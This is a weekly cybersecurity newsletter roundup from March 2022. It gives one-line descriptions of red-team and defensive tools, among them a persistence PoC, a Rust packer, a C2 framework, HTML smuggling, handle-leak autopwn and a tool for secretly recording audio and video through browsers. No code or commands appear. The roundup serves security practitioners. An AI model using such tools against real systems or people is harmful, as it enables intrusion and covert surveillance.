Last Week in Security (LWiS) - 2022-03-21

Browser in the Browser (@mrd0x), OSINT Map (@MalfratsInd), Rust packer (@verixvogel), local Kerberos to bypass UAC (@tiraniddo), crash to read/write in Chakra (@33y0re), AtlasC2 (@Gr1mmie), detecting Shadow Credentials (@cfalta ), and more!

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2022-03-14 to 2022-03-21.


Techniques and Write-ups

Tools and Exploits

  • CustomKeyboardLayoutPersistence can achieve execution using a custom keyboard layout, tested in Windows 11 Home version 21H2. Warning: there is no code related to the uninstallation process in the PoC.
  • Group3r can find vulnerabilities in AD Group Policy, but do it better than Grouper2 did.
  • Malfrat's OSINT Map is an update to the OSINT Framework <>. OSINT-Map is the GitHub repo if you'd like to contribute.
  • oxide A PoC packer written in Rust!
  • AtlasC2 is a C# C2 Framework centered around Stage 1 operations.
  • poro is a tool to scan publicly accessible assets on your AWS cloud environment.
  • snoop Secretly record audio and video with chromium based browsers. Be sure to check out VOODOO, the macOS Man in the Browser Framework as well.
  • Coeus is an ADSI based Situational Awareness toolkit for domain environments with modularity in mind. Allows for the enumeration of users/groups/computers as well as some common misconfigurations including roasting (AS-REP, kerber) and delegation (Constrained, Unconstrained, RCBD) attacks.
  • xepor is a web routing framework for reverse engineers and security researchers, brings the best of mitmproxy & Flask.
  • LeakedHandlesFinder is a leaked Windows processes handles identification tool. Useful for identify new LPE vulnerabilities during a pentest or simply as a new research process. Currently supports exploiting (autopwn) procesess leaked handles spawning a new arbitrary process (cmd.exe default).
  • AutoSmuggle is a utility to craft HTML smuggled files for Red Team engagements.

New to Me

This section is for news, techniques, write-ups, tools, and off-topic items that weren't released last week but are new to me. Perhaps you missed them too!

  • rust_bof. Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.
  • S1EM. This project is a SIEM with SIRP and Threat Intel, all in one.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing. This post is cross-posted on SIXGEN's blog.